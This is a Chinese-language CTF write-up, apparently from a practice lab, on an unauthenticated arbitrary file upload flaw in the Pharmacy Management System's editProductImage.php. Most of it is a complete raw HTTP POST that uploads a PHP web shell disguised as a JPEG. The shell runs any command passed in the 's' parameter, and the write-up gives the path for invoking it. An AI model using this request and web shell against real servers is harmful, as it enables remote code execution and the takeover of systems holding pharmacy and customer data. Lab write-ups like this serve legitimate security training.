…
漏洞描述:多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
exp:https://packetstormsecurity.com/files/166786/Pharmacy-Management-System-1.0-Shell-Upload.html
开启容器,给了一个登陆界面,尝试登陆,发现没有账号,在这卡了有点久。访问/php_action/editProductImage.php回显localhost拒绝了请求,以为需要登录后才可以用,其实不需要,直接访问抓包写入shell就可以了
报文如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: eci-2zea7obo5nr8fk1t72p4.cloudeci1.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=0eb1aac78dc3ba42607ab8cf31c270ec25c7b37d; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1663293722,1664166096,1665551946,1665735159; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1665735163; PHPSESSID=e63668ifbfptj7h0nsu0odo64t
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 556
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg
<?php
if($_REQUEST['s']) {
system($_REQUEST['s']);
} else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"
-----------------------------208935235035266125502673738631--
|
返回Image uploaded successfully{"success":true,"messages":"Successfully Updated"},然后在/assets/myimages/shell.php?s=传s,执行任意代码